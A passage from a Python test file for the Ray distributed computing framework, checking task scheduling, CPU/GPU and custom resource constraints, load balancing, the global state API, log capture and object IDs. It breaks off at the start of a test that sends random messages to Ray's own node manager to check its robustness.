(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert np.alltrue(xref == np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert np.alltrue(xref == ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert np.alltrue(y == ray.put(y))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert np.alltrue(aref == np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(aref == np.array([0, 0]))
assert np.alltrue(bref == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert np.alltrue(test_actor.get_array.remote() == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.5
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.5
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
def get_gpu_ids(num_gpus_per_worker):
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == num_gpus_per_worker
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
f0 = ray.remote(num_gpus=0)(lambda: get_gpu_ids(0))
f1 = ray.remote(num_gpus=1)(lambda: get_gpu_ids(1))
f2 = ray.remote(num_gpus=2)(lambda: get_gpu_ids(2))
f4 = ray.remote(num_gpus=4)(lambda: get_gpu_ids(4))
f5 = ray.remote(num_gpus=5)(lambda: get_gpu_ids(5))
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
# There are only 10 GPUs, and each task uses 5 GPUs, so there should only
# be 2 tasks scheduled at a given time.
t1 = time.time()
ray.get([f5.remote() for _ in range(20)])
assert time.time() - t1 >= 10 * 0.1
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote raylet.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_raylets(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific raylets, and we will check that they are assigned
# to the correct raylets.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and raylets (at least right now), this can be
# used to identify which raylet the task was assigned to.
# This must be run on the zeroth raylet.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first raylet.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second raylet.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second raylet.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second raylet.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(ray_start_regular):
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(ray_start_regular):
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets
# in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets in a
# roughly equal manner even when the tasks have dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the raylets. Make sure
# this doesn't prevent tasks from being scheduled on other raylets.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "ray.tests.test_basic.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "ray.tests.test_basic"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
error_lines = captured["err"]
assert len(error_lines) == 0
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
error_lines = captured["err"]
assert len(error_lines) == 0
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(num_cpus=1, driver_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(ray_start_2_cpus):
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(ray_start_2_cpus):
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID(_random_string()).hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(ray_start_regular):
node_manager_address = None
node_manager_port = None
for client in ray.global_state.client_table():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
